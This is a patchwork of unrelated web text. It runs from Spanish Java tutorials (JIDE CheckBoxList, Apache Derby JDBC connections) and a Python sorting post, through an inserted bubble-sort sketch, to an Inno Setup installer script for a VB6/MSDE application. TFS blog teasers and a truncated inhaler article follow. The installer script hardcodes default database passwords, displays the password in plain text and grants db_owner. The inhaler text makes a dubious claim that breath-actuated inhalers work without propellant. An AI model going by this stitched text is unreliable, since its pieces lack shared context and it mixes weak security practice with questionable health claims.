post sobre un buscador de componentes gratuitos para java, es lo que nos ayudará en esta oportunidad. Uno de esos componentes que tanto necesitamos es el CheckBoxList o CheckListBox como prefieran llamarlo, el cual no lo obtenemos en la lista de componentes por defecto, por lo menos no en NetBeans u otros que he visto, por ello vamos a descargarlo e importarlo al proyecto que estamos desarrollando. Una vez importado, dentro del JAR descargado tendremos varios otros componentes, pero lo que nos interesa probar ahora es el CheckBoxList que se encuentra en: com.jidesoft.swing.CheckBoxList De todos los componentes de este tipo que he encontrado y probado puedo decirles que este es el más recomendado para usarlo. 
Ahora veamos un ejemplo de como se usa , verán que es super sencillo: /** * jide-oss-2.4.8.jar */ package beastieux.gui; import com.jidesoft.swing.CheckBoxList; import javax.swing.DefaultListModel; import javax.swing.JFrame; import javax.swing.JScrollPane; /** * * @author beastieux */ public class Ejm16_JCheckListBox extends JFrame { public Ejm16_JCheckListBox() { CheckBoxList cblEjemplo = new CheckBoxList(); JScrollPane scpEjemplo=new JScrollPane(); DefaultListModel lmdlEjemplo=new DefaultListModel(); lmdlEjemplo.addElement("Item 0"); lmdlEjemplo.addElement("Item 1"); lmdlEjemplo.addElement("Item 2"); lmdlEjemplo.addElement("Item 3"); lmdlEjemplo.addElement("Item 4"); lmdlEjemplo.addElement("Item 5"); lmdlEjemplo.addElement("Item 6"); lmdlEjemplo.addElement("Item 7"); lmdlEjemplo.addElement("Item 8"); lmdlEjemplo.addElement("Item 9"); cblEjemplo.setModel(lmdlEjemplo); scpEjemplo.add(cblEjemplo); this.add(scpEjemplo); scpEjemplo.setViewportView(cblEjemplo); scpEjemplo.setSize(100, 150); this.setLayout(null); this.setSize(300, 400); setDefaultCloseOperation(javax.swing.WindowConstants.DISPOSE_ON_CLOSE); } public static void main(String args[]) { Ejm16_JCheckListBox obj = new Ejm16_JCheckListBox(); obj.setVisible(true); } } Código Java – Conexión a Base de Datos Apache Derby (Embebida y Cliente – Servidor) Este es el Ejemplo #12.3 del Topic: Programación Gráfica en Java, que viene a formar parte del Topic #12 Código Java – Establecer Conexión a Base de Datos con JDBC Como he explicado en el Topic #12, para realizar las conexiones necesitaremos los drivers respectivos, de acuerdo al motor de base de datos al cual deseemos conectarnos. En este ejemplo estableceremos una conexión con Apache Derby en sus modalidades Embebida y Cliente-Servidor, para el cual es necesario contar con las respectivas librería que pueden ser similares a las que se muestran a continuación: derby.jar (Embebida) derbyclient.jar (Cliente - Servidor) Estas dos librerías corresponden para una base de datos Apache Derby Embebida y Cliente Servidor respectivamente. Si Derby ha sido instalada de la modalidad mostrada en el post Instalación y Ejecución de Apache Derby en Linux, las librerías podrán ubicarse en las siguientes rutas: /usr/lib/jvm/java-6-sun/db/lib/derby.jar /usr/lib/jvm/java-6-sun/db/lib/derbyclient.jar En caso contrario, las librerías deberán ser obtenidas de medios externos. 
Ustedes deberán conseguir la librería de acuerdo a la versión de Derby al cual deseen conectarse y establecer los parámetros de conexión como se muestra en el código siguiente: Conexión a Base de Datos Derby Cliente – Sevidor: package beastieux.gui; import java.sql.Connection; import java.sql.DriverManager; import java.sql.Statement; import java.sql.ResultSet; import javax.sql.rowset.CachedRowSet; import com.sun.rowset.CachedRowSetImpl; /** * * @author beastieux */ public class Ejm12_3_ConectarDerby { public CachedRowSet Function(String sql) { try { Class.forName("org.apache.derby.jdbc.ClientDriver"); String url = "jdbc:derby://localhost:1527/dbtest"; Connection con = DriverManager.getConnection(url); Statement s = con.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE, ResultSet.CONCUR_READ_ONLY); ResultSet rs= s.executeQuery(sql); CachedRowSet crs = new CachedRowSetImpl(); crs.populate(rs); rs.close(); s.close(); con.close(); return crs; } catch(Exception e) { System.out.println(e.getMessage()); } return null; } public void StoreProcedure(String sql) { try { Class.forName("org.apache.derby.jdbc.ClientDriver"); String url = "jdbc:derby://localhost:1527/dbtest"; Connection con = DriverManager.getConnection(url); Statement s = con.createStatement(); s.execute(sql); s.close(); con.close(); } catch(Exception e) { System.out.println(e.getMessage()); } } } Conexión a Base de Datos Derby Embebida: package beastieux.gui; import java.sql.Connection; import java.sql.DriverManager; import java.sql.Statement; import java.sql.ResultSet; import javax.sql.rowset.CachedRowSet; import com.sun.rowset.CachedRowSetImpl; /** * * @author beastieux */ public class Ejm12_3_ConectarDerby { public CachedRowSet Function(String sql) { try { Class.forName("org.apache.derby.jdbc.EmbeddedDriver"); String url = "jdbc:derby:/home/beastieux/dbtest"; Connection con = DriverManager.getConnection(url); Statement s = con.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE, ResultSet.CONCUR_READ_ONLY); ResultSet rs= s.executeQuery(sql); CachedRowSet crs = new CachedRowSetImpl(); crs.populate(rs); rs.close(); s.close(); con.close(); return crs; } catch(Exception e) { System.out.println(e.getMessage()); } return null; } public void StoreProcedure(String sql) { try { Class.forName("org.apache.derby.jdbc.EmbeddedDriver"); String url = "jdbc:derby:/home/beastieux/dbtest"; Connection con = DriverManager.getConnection(url); Statement s = con.createStatement(); s.execute(sql); s.close(); con.close(); } catch(Exception e) { System.out.println(e.getMessage()); } } } En el caso de conexión a base de datos embebida, la URL contiene la ubicación de la base de datos la cual deberá ser reemplazado de acuerdo a su propia configuración: String url = "jdbc:derby:/home/beastieux/dbtest"; Métodos de Ordenamiento Hechos en Python Los primeros posts que realizo sobre Python estarán dedicados a los métodos de ordenamiento. Hasta el momento la codificación en python me ha sorprendido mucho porque es muy sencilla, limpia, no necesitas escribir mucho a comparación de otros lenguajes de programación. Si te gusta la programación te aseguro que python te va a encantar. 
Aquí les dejos los métodos de ordenamiento escritos en Python: Método Burbuja: Ordenamiento Burbuja.py Método Shell: Ordenamiento Shell.py Método QuickSort: Ordenamiento por método QuickSort.py Método Inserción Directa: Ordenamiento por inserción Directa.py Método Inserción Binaria: Ordenamiento por inserción Binaria.py Método Selección: Ordenamiento método Selección.py Método HeapSort: Ordenamiento método HeapSort.py
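The linked files are not reproduced in the post, so as a quick reference here is a minimal bubble sort sketch in Python. It is an illustrative example only and is not the content of Ordenamiento Burbuja.py.

# Minimal bubble sort sketch (illustrative; not the author's linked file).
def bubble_sort(items):
    data = list(items)  # work on a copy so the input list is left untouched
    n = len(data)
    for i in range(n - 1):
        swapped = False
        for j in range(n - 1 - i):
            if data[j] > data[j + 1]:
                data[j], data[j + 1] = data[j + 1], data[j]
                swapped = True
        if not swapped:  # no swaps in this pass: already sorted, stop early
            break
    return data

print(bubble_sort([5, 1, 4, 2, 8]))  # [1, 2, 4, 5, 8]

The early exit when a full pass makes no swaps is optional, but it keeps the best case linear.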
Skip to main content Inno installation script: VB6, MSDE, MDAC An Inno installation script I wrote to install a VB6 application and optionally, MSDE and MDAC. It also executes several database scripts as well as prompts the user to install MSDE or choose an existing SQL Server database. ; MyApp Install Script ; Author: Jeff Hunsaker ; Version: 1.0.0.0 #define AppName "MyApp" #define AppNameLong "My App" #define AppPublisher "My Firm, Inc." #define Ver1 "1" #define Ver2 "0" #define Ver3 "0" #define Ver4 "0" #define MinVersion "4.1.1998,4.0.1381sp5" #define DBInstance "DBInstance" ;when MSDE installed locally/new #define DBDatabase "DBDatabase" #define DBDefaultSaPassword "sapassword" #define DBDefaultSaAccount "sa" #define DBAppUserName "AppUser" #define DBAppPassword "password" #define DBDefaultServer "(LOCAL)" #define DBDSN "MyApp" #define DBDSNDescription = "My App" [Setup] MinVersion={#MinVersion} OnlyBelowVersion=0,0 AppCopyright=© 2005 {#AppPublisher} AppName={#AppNameLong} AppVerName={#AppNameLong} {#Ver1}.{#Ver2}.{#Ver3}.{#Ver4} PrivilegesRequired=admin AllowRootDirectory=true AllowUNCPath=false ShowLanguageDialog=no WizardImageFile=logos\some.bmp WizardImageStretch=no AppID={{42F4A6D5-72BF-4C3E-AFE9-A345C13C842D} AppMutex={#AppName} DefaultDirName={pf}\{#AppName} EnableDirDoesntExistWarning=true AlwaysShowComponentsList=false DisableReadyPage=no LanguageDetectionMethod=none AppPublisher={#AppPublisher} AppPublisherURL=http://www.myfirm.com/ AppVersion={#Ver1}.{#Ver2} UninstallDisplayName={#AppNameLong} {#Ver1}.{#Ver2}.{#Ver3}.{#Ver4} UserInfoPage=yes UsePreviousUserInfo=yes DefaultGroupName={#AppName} DisableProgramGroupPage=yes [_ISTool] LogFile=cwinstall.log LogFileAppEND=true [Icons] Name: {group}\{#AppName}; Filename: {app}\{#AppName}.exe; WorkingDir: {app} Name: {group}\{cm:UninstallProgram, {#AppName}}; Filename: {uninstallexe} [Files] ;************************************************************************************************ ; VB system files ;************************************************************************************************ ; see also ; http://support.microsoft.com/default.aspx?scid=kb;en-us;830761 ;************************************************************************************************ Source: vbfiles\stdole2.tlb; DestDir: {sys}; Flags: restartreplace uninsneveruninstall sharedfile regtypelib Source: vbfiles\msvbvm60.dll; DestDir: {sys}; Flags: restartreplace uninsneveruninstall sharedfile regserver Source: vbfiles\oleaut32.dll; DestDir: {sys}; Flags: restartreplace uninsneveruninstall sharedfile regserver Source: vbfiles\olepro32.dll; DestDir: {sys}; Flags: restartreplace uninsneveruninstall sharedfile regserver Source: vbfiles\asycfilt.dll; DestDir: {sys}; Flags: restartreplace uninsneveruninstall sharedfile Source: vbfiles\comcat.dll; DestDir: {sys}; Flags: restartreplace uninsneveruninstall sharedfile regserver ;************************************************************************************************ ; 3rd party DLL files ;************************************************************************************************ Source: projectfiles\somedll.DLL; DestDir: {app}; Flags: restartreplace sharedfile uninsnosharedfileprompt ;************************************************************************************************ ; MS DLL files ;************************************************************************************************ Source: system32\msstdfmt.dll; DestDir: {sys}; Flags: restartreplace sharedfile regserver Source: 
system32\msbind.dll; DestDir: {sys}; Flags: restartreplace sharedfile regserver Source: misc\dao360.dll; DestDir: {dao}; Flags: restartreplace sharedfile regserver Source: misc\sqlns.rll; DestDir: {pf}\Microsoft SQL Server\80\Tools\Binn\Resources\1033; Flags: restartreplace sharedfile ;************************************************************************************************ ; VB OCX files ;************************************************************************************************ Source: msocxs\COMCT332.ocx; DestDir: {sys}; Flags: restartreplace sharedfile regserver uninsneveruninstall Source: msocxs\MSCOMCT2.ocx; DestDir: {sys}; Flags: restartreplace sharedfile regserver uninsneveruninstall Source: msocxs\MSCOMCTL.ocx; DestDir: {sys}; Flags: restartreplace sharedfile regserver uninsneveruninstall Source: msocxs\TABCTL32.ocx; DestDir: {sys}; Flags: restartreplace sharedfile regserver uninsneveruninstall Source: msocxs\MSMASK32.ocx; DestDir: {sys}; Flags: restartreplace sharedfile regserver uninsneveruninstall Source: msocxs\MSDATGRD.ocx; DestDir: {sys}; Flags: restartreplace sharedfile regserver uninsneveruninstall Source: msocxs\COMDLG32.ocx; DestDir: {sys}; Flags: restartreplace sharedfile regserver uninsneveruninstall Source: msocxs\MSADODC.ocx; DestDir: {sys}; Flags: restartreplace sharedfile regserver uninsneveruninstall ;************************************************************************************************ ; 3rd party OCX files ;************************************************************************************************ Source: system32\someocx.ocx; DestDir: {sys}; Flags: restartreplace sharedfile regserver uninsnosharedfileprompt ;************************************************************************************************ ; project files ;************************************************************************************************ Source: projectfiles\{#AppName}.exe; DestDir: {app}; Flags: replacesameversion uninsnosharedfileprompt ;************************************************************************************************ ; MDAC ;************************************************************************************************ Source: MDAC\mdac_typ.exe; DestDir: {tmp}\mdac; MinVersion: {#MinVersion}; Flags: ignoreversion; Check: GetNotInstallMSDEFlag ;************************************************************************************************ ; MSDE 2000 SP3a ;************************************************************************************************ Source: msde\*.*; DestDir: {tmp}\msde; MinVersion: {#MinVersion}; Flags: ignoreversion; Check: GetInstallMSDEFlag Source: msde\msi\*.*; DestDir: {tmp}\msde\msi; MinVersion: {#MinVersion}; Flags: ignoreversion; Check: GetInstallMSDEFlag Source: msde\msm\*.*; DestDir: {tmp}\msde\msm; MinVersion: {#MinVersion}; Flags: ignoreversion; Check: GetInstallMSDEFlag Source: msde\msm\1033\*.*; DestDir: {tmp}\msde\msm\1033; MinVersion: {#MinVersion}; Flags: ignoreversion; Check: GetInstallMSDEFlag Source: msde\setup\*.*; DestDir: {tmp}\msde\setup; MinVersion: {#MinVersion}; Flags: ignoreversion; Check: GetInstallMSDEFlag ;************************************************************************************************ ; SQL scripts ;************************************************************************************************ Source: scripts\osql.exe; DestDir: {tmp}\scripts Source: scripts\buildobjects.sql; DestDir: {tmp}\scripts Source: scripts\createdatabase.sql; DestDir: {tmp}\scripts Source: 
scripts\populatedata.sql; DestDir: {tmp}\scripts [Run] ;************************************************************************************************ ; MSDE 2000 SP3a: ;************************************************************************************************ ; see also: ; http: //msdn.microsoft.com/library/default.asp?url=/library/en-us/distsql/distsql_84xl.asp ;************************************************************************************************ Filename: {tmp}\msde\Setup.exe; Parameters: SECURITYMODE=SQL INSTANCENAME={#DBInstance} SAPWD={#DBDefaultSaPassword}; WorkingDir: {tmp}\msde; MinVersion: {#MinVersion}; StatusMsg: Installing Microsoft Data Engine (MSDE); Check: GetInstallMSDEFlag Filename: {pf}\Microsoft SQL Server\80\Tools\Binn\scm.exe; Parameters: -Action 1 -Pwd {code:GetDbPassword} -Service MSSQL${#DBInstance} -Silent 1; WorkingDir: {pf}\Microsoft SQL Server\80\Tools\Binn; MinVersion: {#MinVersion}; StatusMsg: Starting Microsoft Data Engine (MSDE); Check: GetInstallMSDEFlag ;************************************************************************************************ ; MDAC 2.7 SP1 Refresh (WinXP) ;************************************************************************************************ ; see also: ; http://msdn.microsoft.com/library/default.asp?url=/library/en-us/mdacsdk/htm/wphistory_redistributemdac.asp ; http://support.microsoft.com/default.aspx?scid=kb;EN-US;842262 ;************************************************************************************************ Filename: {tmp}\mdac\mdac_typ.exe; Parameters: "/Q:A /C:""dasetup /Q:D /N"""; WorkingDir: {tmp}\mdac; MinVersion: {#MinVersion}; StatusMsg: Installing Microsoft Data Access Components (MDAC); Check: GetNotInstallMSDEFlag ;************************************************************************************************ ; SQL scripts ;************************************************************************************************ ; execute base SQL for new installations Filename: {tmp}\scripts\osql.exe; Parameters: -U{code:GetDbLogin} -P{code:GetDbPassword} -S{code:GetDbServer} -dmaster -ocreatedatabase.log -r -e -i{tmp}\scripts\createdatabase.sql; WorkingDir: {tmp}\scripts; Flags: runhidden; Check: GetDatabaseNotExistsFlag; StatusMsg: Executing database scripts: create database Filename: {tmp}\scripts\osql.exe; Parameters: "-U{code:GetDbLogin} -P{code:GetDbPassword} -S{code:GetDbServer} -dmaster -oaddlogin.log -r -e -Q""if not exists(SELECT * FROM master..syslogins WHERE name='{#DBAppUserName}') exec sp_addlogin '{#DBAppUserName}', '{#DBAppPassword}', '{#DBDatabase}';"""; WorkingDir: {tmp}\scripts; Flags: runhidden; StatusMsg: Executing database scripts: create application account Filename: {tmp}\scripts\osql.exe; Parameters: "-U{code:GetDbLogin} -P{code:GetDbPassword} -S{code:GetDbServer} -d{#DBDatabase} -ograntdbaccess.log -r -e -Q""if not exists(SELECT * FROM sysusers WHERE name='{#DBAppUserName}') exec sp_grantdbaccess @loginame='{#DBAppUserName}';"""; WorkingDir: {tmp}\scripts; Flags: runhidden; StatusMsg: Executing database scripts: create application account Filename: {tmp}\scripts\osql.exe; Parameters: "-U{code:GetDbLogin} -P{code:GetDbPassword} -S{code:GetDbServer} -d{#DBDatabase} -oaddrole.log -r -e -Q""exec sp_addrolemember @rolename='db_owner', @membername='{#DBAppUserName}';"""; WorkingDir: {tmp}\scripts; Flags: runhidden; StatusMsg: Executing database scripts: create application account Filename: {tmp}\scripts\osql.exe; Parameters: -U{code:GetDbLogin} -P{code:GetDbPassword} 
-S{code:GetDbServer} -d{#DBDatabase} -obuildobjects.log -r -e -i{tmp}\scripts\buildobjects.sql; WorkingDir: {tmp}\scripts; Flags: runhidden; Check: GetDatabaseNotExistsFlag; StatusMsg: Executing database scripts: create objects Filename: {tmp}\scripts\osql.exe; Parameters: -U{code:GetDbLogin} -P{code:GetDbPassword} -S{code:GetDbServer} -d{#DBDatabase} -opopulatedata.log -r -e -i{tmp}\scripts\populatedata.sql; WorkingDir: {tmp}\scripts; Flags: runhidden; Check: GetDatabaseNotExistsFlag; StatusMsg: Executing database scripts: populate data ; TODO: execute update SQL for this version ; update database version value Filename: {tmp}\scripts\osql.exe; Parameters: "-U{code:GetDbLogin} -P{code:GetDbPassword} -S{code:GetDbServer} -d{#DBDatabase} -odel_DatabaseVersion.log -r -e -Q""DELETE FROM {#DBDatabase}..DatabaseVersion"""; WorkingDir: {tmp}\scripts; Flags: runhidden; StatusMsg: Executing database scripts: update version Filename: {tmp}\scripts\osql.exe; Parameters: "-U{code:GetDbLogin} -P{code:GetDbPassword} -S{code:GetDbServer} -d{#DBDatabase} -oins_DatabaseVersion.log -r -e -Q""INSERT INTO {#DBDatabase}..DatabaseVersion (DatabaseVersionID, CurrentVersion) VALUES (1, '{#Ver1}.{#Ver2}.{#Ver3}.{#Ver4}')"""; WorkingDir: {tmp}\scripts; Flags: runhidden; StatusMsg: Executing database scripts: update version [Registry] Root: HKLM; SubKey: Software\ODBC\ODBC.INI\ODBC Data Sources; Flags: createvalueifdoesntexist uninsdeletevalue deletevalue; ValueName: {#DBDSN}; ValueType: string; ValueData: SQL Server Root: HKLM; SubKey: Software\ODBC\ODBC.INI\{#DBDSN}; Flags: createvalueifdoesntexist uninsdeletevalue deletevalue; ValueName: Driver; ValueType: string; ValueData: {sys}\SQLSRV32.dll Root: HKLM; SubKey: Software\ODBC\ODBC.INI\{#DBDSN}; Flags: createvalueifdoesntexist uninsdeletevalue deletevalue; ValueName: Server; ValueType: string; ValueData: {code:GetDbServer} Root: HKLM; SubKey: Software\ODBC\ODBC.INI\{#DBDSN}; Flags: createvalueifdoesntexist uninsdeletevalue deletevalue; ValueName: Database; ValueType: string; ValueData: {#DBDatabase} Root: HKLM; SubKey: Software\ODBC\ODBC.INI\{#DBDSN}; Flags: createvalueifdoesntexist uninsdeletevalue deletevalue; ValueName: Description; ValueType: string; ValueData: {#DBDSNDescription} [INI] [CustomMessages] databaseInfoCaption=Database information databaseInfoDescription=Please indicate the database information [Code] var Label1: TLabel; Label2: TLabel; Label3: TLabel; txtServer: TEdit; rbInstallMSDE: TRadioButton; rbUseExisting: TRadioButton; txtLogin: TEdit; txtPassword: TEdit; _installMSDE: boolean; // installing MSDE locally or using existing SQL instance dbExists: boolean; // installing to new or existing database dbServer: String; // use existing SQL Server server name dbLogin: String; // use existing SQL Server login dbPassword: String; // use existing SQL Server password //************************************************************************************************ // EVENT HANDLERS //************************************************************************************************ procedure databaseInfo_Activate(Page: TWizardPage); begin end; procedure databaseInfo_CancelButtonClick(Page: TWizardPage; var Cancel, Confirm: Boolean); begin end; procedure rbUseExisting_Click(Sender: TObject); begin // enable entry fields txtServer.Enabled := True; txtServer.ReadOnly := False; txtLogin.Enabled := True; txtLogin.ReadOnly := False; txtPassword.Enabled := True; txtPassword.ReadOnly := False; end; procedure rbInstallMSDE_Click(Sender: TObject); begin // 
disable entry fields txtServer.Enabled := False txtServer.ReadOnly := True; txtLogin.Enabled := False; txtLogin.ReadOnly := True; txtPassword.Enabled := False; txtPassword.ReadOnly := True; end; //************************************************************************************************ // FUNCTIONS //************************************************************************************************ function InitializeSetup(): Boolean; begin // extract OSQL.exe file...needed in databaseInfo_NextButtonClick() ExtractTemporaryFile('osql.exe'); Result := True; end; procedure DeInitializeSetup(); begin end; function GetInstallMSDEFlag: Boolean; begin Result := _installMSDE; end; function GetNotInstallMSDEFlag: Boolean; begin Result := not _installMSDE; // coded this way to accommodate the Check values end; function GetDatabaseExistsFlag: Boolean; begin Result := dbExists; end; function GetDatabaseNotExistsFlag: Boolean; begin Result := not dbExists; // coded this way to accommodate the Check values end; function GetDbServer(Default:String): String; begin Result := dbServer; end; function GetDbLogin(Default:String): String; begin Result := dbLogin; end; function GetDbPassword(Default:String): String; begin Result := dbPassword; end; function GetDbInstallType(Default:String): String; begin if (_installMSDE) then Result := 'Local' else Result := 'Remote'; end; // returns a string given a boolean and 2 representative return strings function BoolToStr(b:boolean; TrueValue:string; FalseValue:string) : String; begin if b then Result:=TrueValue else Result:=FalseValue; end; // output pre-installation stats function UpdateReadyMemo(Space, NewLine, MemoUserInfoInfo, MemoDirInfo, MemoTypeInfo, MemoComponentsInfo, MemoGroupInfo, MemoTasksInfo: String): String; var cTemp: String; DatabaseInfo: String; begin // create database information DatabaseInfo := 'Database information:' + NewLine; if (_installMSDE) then begin DatabaseInfo := DatabaseInfo + CHR(9) + 'Install MSDE locally' + NewLine; DatabaseInfo := DatabaseInfo + CHR(9) + 'Server: ' + dbServer + NewLine; DatabaseInfo := DatabaseInfo + CHR(9) + 'Login: ' + dbLogin + NewLine; // DatabaseInfo := DatabaseInfo + CHR(9) + 'Password: *****' + NewLine; DatabaseInfo := DatabaseInfo + CHR(9) + 'Password: ' + dbPassword + NewLine; end else begin DatabaseInfo := DatabaseInfo + CHR(9) + 'Use existing SQL Server' + NewLine; DatabaseInfo := DatabaseInfo + CHR(9) + 'Server: ' + dbServer + NewLine; DatabaseInfo := DatabaseInfo + CHR(9) + 'Login: ' + dbLogin + NewLine; // DatabaseInfo := DatabaseInfo + CHR(9) + 'Password: *****' + NewLine; DatabaseInfo := DatabaseInfo + CHR(9) + 'Password: ' + dbPassword + NewLine; end; cTemp := MemoUserInfoInfo + NewLine + NewLine; cTemp := cTemp + MemoDirInfo + NewLine + NewLine; cTemp := cTemp + DatabaseInfo + NewLine + NewLine; Result := cTemp; end; function databaseInfo_ShouldSkipPage(Page: TWizardPage): Boolean; begin Result := False; end; function databaseInfo_BackButtonClick(Page: TWizardPage): Boolean; begin Result := True; end; // executes upon clicking Next within database info dialog function databaseInfo_NextButtonClick(Page: TWizardPage): Boolean; var ResultCode: Integer; output: String; begin // initialize _installMSDE := False; dbExists := False; // install MSDE ok if (rbInstallMSDE.Checked) then begin _installMSDE := True; // MAY be overriden in the logic below dbServer := '{#DBDefaultServer}\{#DBInstance}'; dbLogin := '{#DBDefaultSaAccount}'; dbPassword := '{#DBDefaultSaPassword}'; Result := True; end else begin 
// ensure all fields provided if use existing selected if ((rbUseExisting.Checked) and ((txtServer.Text = '') or (txtLogin.Text = '') or (txtPassword.Text = ''))) then begin MsgBox('You must provide server, login, and password for an existing installation.', mberror, MB_OK); Result := False; end else begin // persist entered values dbServer := txtServer.Text; dbLogin := txtLogin.Text; dbPassword := txtPassword.Text; _installMSDE := False; Result := True; end end; // output check for existing database message MsgBox ('Setup will now determine if the database exists. This may take up to 30 seconds.', mbInformation, MB_OK); // determine if instance/database exist if Exec(ExpandConstant('{tmp}\osql.exe'), '-U' + dbLogin + ' -P' + dbPassword + ' -S' + dbServer + ' -l10 -odatabaseexists.log -Q"EXIT(SELECT COUNT(*) FROM master..sysdatabases WHERE name=''{#DBDatabase}'')"', '', SW_HIDE, ewWaitUntilTerminated, ResultCode) then begin // read in the OSQL output file 0 if not exists, 1 if exists --> MUST LOOK FOR '0' FIRST because file returns 1 record(s) affected if LoadStringFromFile(ExpandConstant('{tmp}\databaseexists.log'), output) then begin if Pos(ExpandConstant(IntToStr(0)), output)>0 then begin if (_installMSDE) then begin // Delete any stragler crgp .mdf and .ldf files but leave the directory itself DelTree(ExpandConstant('{pf}\Microsoft SQL Server\MSSQL${#DBInstance}\Data\{#DBDatabase}*'), False, True, True); DelTree(ExpandConstant('{pf}\Microsoft SQL Server\MSSQL${#DBInstance}\Data\' + Lowercase(ExpandConstant('{#DBDatabase}')) + '*'), False, True, True); // database does not exist but instance does; user indicated install MSDE; else user indicated use existing SQL Server MsgBox ('The database does not yet exist and will be created during installation. Original system account and password is assumed. Click back and choose existing SQL Server if this is incorrect.', mbInformation, MB_OK); _installMSDE := False; end else MsgBox ('The database does not yet exist and will be created during installation using the credentials supplied.', mbInformation, MB_OK); end else begin if Pos(ExpandConstant(IntToStr(1)), output)>0 then begin if (_installMSDE) then begin // database and instance exist; user indicated install MSDE; else user indicated use existing SQL Server // should never hit this but coded it anyway just in case MsgBox ('The database exists and will undergo an upgrade during installation. Original system account and password is assumed. Click back and choose existing SQL Server if this is incorrect.', mbInformation, MB_OK); _installMSDE := False; end else MsgBox ('The database exists and will undergo an upgrade during installation using the credentials supplied.', mbInformation, MB_OK); dbExists := True; _installMSDE := False; end else begin if Pos('Login failed for user', output)>0 then begin // credentials incorrect MsgBox ('Incorrect login credentials.', mbInformation, MB_OK); Result := False; end else begin if Pos('SQL Server does not exist', output)>0 then begin // server does not exist if not _installMSDE then begin MsgBox ('SQL Server does not exist. 
Try re-entering the information.', mbInformation, MB_OK); Result := False; end else begin // Delete any stragler crgp .mdf and .ldf files but leave the directory itself DelTree(ExpandConstant('{pf}\Microsoft SQL Server\MSSQL${#DBInstance}\Data\{#DBDatabase}*'), False, True, True); DelTree(ExpandConstant('{pf}\Microsoft SQL Server\MSSQL${#DBInstance}\Data\' + Lowercase(ExpandConstant('{#DBDatabase}')) + '*'), False, True, True); MsgBox ('MSDE will be installed locally. Afterward, a reboot may be required (select yes if prompted).', mbInformation, MB_OK); Result := True; _installMSDE := True; end end end end end end end; end; function databaseInfo_CreatePage(PreviousPageId: Integer): Integer; var Page: TWizardPage; begin Page := CreateCustomPage( PreviousPageId, ExpandConstant('{cm:databaseInfoCaption}'), ExpandConstant('{cm:databaseInfoDescription}') ); { Label1 } Label1 := TLabel.Create(Page); with Label1 do begin Parent := Page.Surface; Left := ScaleX(16); Top := ScaleY(56); Width := ScaleX(58); Height := ScaleY(13); Caption := 'SQL Server:'; end; { Label2 } Label2 := TLabel.Create(Page); with Label2 do begin Parent := Page.Surface; Left := ScaleX(16); Top := ScaleY(104); Width := ScaleX(58); Height := ScaleY(13); Caption := 'Login name:'; end; { Label3 } Label3 := TLabel.Create(Page); with Label3 do begin Parent := Page.Surface; Left := ScaleX(16); Top := ScaleY(152); Width := ScaleX(50); Height := ScaleY(13); Caption := 'Password:'; end; { rbInstallMSDE } rbInstallMSDE := TRadioButton.Create(Page); with rbInstallMSDE do begin Parent := Page.Surface; Left := ScaleX(0); Top := ScaleY(8); Width := ScaleX(361); Height := ScaleY(17); Caption := 'Install Microsoft SQL Server Database Engine (MSDE) locally'; TabOrder := 1; Checked := True; ONCLICK := @rbInstallMSDE_Click; end; { rbUseExisting } rbUseExisting := TRadioButton.Create(Page); with rbUseExisting do begin Parent := Page.Surface; Left := ScaleX(0); Top := ScaleY(32); Width := ScaleX(401); Height := ScaleY(17); Caption := 'Use existing SQL Server installation. 
Account must have administrative rights.'; TabOrder := 2; TabStop := True; ONCLICK := @rbUseExisting_Click; end; { txtServer } txtServer := TEdit.Create(Page); with txtServer do begin Parent := Page.Surface; Left := ScaleX(16); Top := ScaleY(72); Width := ScaleX(257); Height := ScaleY(21); Enabled := False; ReadOnly := True; TabOrder := 3; end; { txtLogin } txtLogin := TEdit.Create(Page); with txtLogin do begin Parent := Page.Surface; Left := ScaleX(16); Top := ScaleY(120); Width := ScaleX(257); Height := ScaleY(21); Enabled := False; ReadOnly := True; TabOrder := 4; end; { txtPassword } txtPassword := TEdit.Create(Page); with txtPassword do begin Parent := Page.Surface; Left := ScaleX(16); Top := ScaleY(168); Width := ScaleX(257); Height := ScaleY(21); Enabled := False; ReadOnly := True; TabOrder := 5; end; with Page do begin OnActivate := @databaseInfo_Activate; OnShouldSkipPage := @databaseInfo_ShouldSkipPage; OnBackButtonClick := @databaseInfo_BackButtonClick; OnNextButtonClick := @databaseInfo_NextButtonClick; OnCancelButtonClick := @databaseInfo_CancelButtonClick; end; Result := Page.ID; end; //************************************************************************************************ // PROCEDURES //************************************************************************************************ procedure InitializeWizard(); begin // display custom database page after selecting directory databaseInfo_CreatePage(wpSelectDir); end; Comments Anonymous said… can i have a full examples pls Jeff Hunsaker said… Ha, that's funny. Oh, you're not joking. That is a full example. Anonymous said… i mean all main files and sub folders pealse. thanks Jeff Hunsaker said… Just add the files desired for install to the [Files] section. Popular posts from this blog Get Your Team Foundation Server Hate On! [Google ranking skyrockets... ;-)] I'm a big fan of TFS/VSTS. However, there are a good pocket of folks who take issue with the way TFS handles or implements a certain feature. Well this is your chance to vent! I'm planning a presentation around the "Top 10 TFS/VSTS Hates and How to Alleviate Them"...or something along those lines. But I need your help. Post a comment below detailing your dislike. If it's legitimate, I'll highlight it in the presentation and [hopefully] provide an alternative, resolution, or work-around. Thanks in advance! Update 7/19/2008: Version Control and Microsoft Rollback a Ooops in TFS with TFPT Rollback Rhut roe, Raggie. You just checked in a merge operation affecting 100's of files in TFS against the wrong branch. Ooops. Well, you can simply roll it back, right? Select the folder in Source Control Explorer and...hey, where's the Rollback? Rollback isn't supported in TFS natively. However, it is supported within the Power Tools leveraging the command-line TFPT.exe utility. It's fairly straightforward to revert back to a previous version--with one caveot. First, download and install the Team Foundation Power Tools 2008 on your workstation. Before proceeding, let's create a workspace dedicated to the rollback. To "true up" the workspace, the rollback operation will peform a Get Latest for every file in your current workspace. This can consume hours (and many GB) with a broad workspace mapping. To work around this, I create a temporary workspace targeted at just the area of source I need to roll back. So let's drill down on our scenario... 
Breath Actuated Metered Dose Inhaler

[Photo: Woman using an asthma inhaler in a garden. Tim Robberts / Getty Images]

A breath actuated metered dose inhaler (MDI) is a type of inhaler that delivers asthma medication to your lungs. With this type of MDI, the medication is delivered into your lungs during inhalation instead of via a propellant, as is the case with other MDIs. When using a breath actuated metered dose inhaler, proper technique is important, because improper use means less medication reaches your lungs.

Use

Some MDIs require priming, that is, spraying one or several puffs when the inhaler is new or has not been used for a certain period of time. This requirement varies among devices; check with your doctor or refer to the package insert for specific instructions. It is also a good idea to review inhaler technique with your doctor, asthma educator, or pharmacist for general and product-specific instructions on your MDI technique.

1. Remove the cap from the mouthpiece and shake the inhaler for five seconds. Failing to shake before use leads to unreliable dosing when the medication is released.
